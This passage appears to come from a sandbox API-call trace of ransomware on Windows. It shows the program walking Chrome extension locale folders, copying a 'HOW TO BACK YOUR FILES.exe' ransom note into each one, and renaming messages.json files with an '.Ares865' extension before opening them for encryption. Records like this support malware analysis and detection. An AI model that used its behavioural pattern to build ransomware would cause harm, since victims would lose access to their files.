Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.326] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.326] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=195) returned 1 [0103.329] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl" [0103.330] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl" [0103.330] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.330] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.330] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.331] GetLastError () returned 0x0 [0103.331] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.331] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865d1c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ef455e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ef455e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.331] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.331] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.331] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.Ares865") returned 160 [0103.331] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.332] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.333] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=217) returned 1 [0103.395] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms" [0103.396] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms" [0103.396] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.396] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.396] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.397] GetLastError () returned 0x0 [0103.397] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.397] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865d1c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ef6b740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ef6b740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.397] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.397] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.397] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.Ares865") returned 160 [0103.397] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.399] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.399] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=207) returned 1 [0103.403] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv" [0103.403] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv" [0103.403] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.403] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.403] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.404] GetLastError () returned 0x0 [0103.404] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.404] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865abaf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ef6b740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ef6b740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.404] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.404] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.404] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.Ares865") returned 160 [0103.404] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.406] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=224) returned 1 [0103.411] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt" [0103.412] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt" [0103.412] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.412] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.412] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.413] GetLastError () returned 0x0 [0103.413] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.413] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865abaf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ef6b740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ef6b740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.413] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.413] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.413] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.Ares865") returned 160 [0103.413] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.415] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.415] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=228) returned 1 [0103.418] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko" [0103.418] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko" [0103.418] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.418] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.419] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.419] GetLastError () returned 0x0 [0103.419] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.419] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ef918a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ef918a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.420] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.420] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.420] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.Ares865") returned 160 [0103.420] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.422] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=218) returned 1 [0103.425] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local 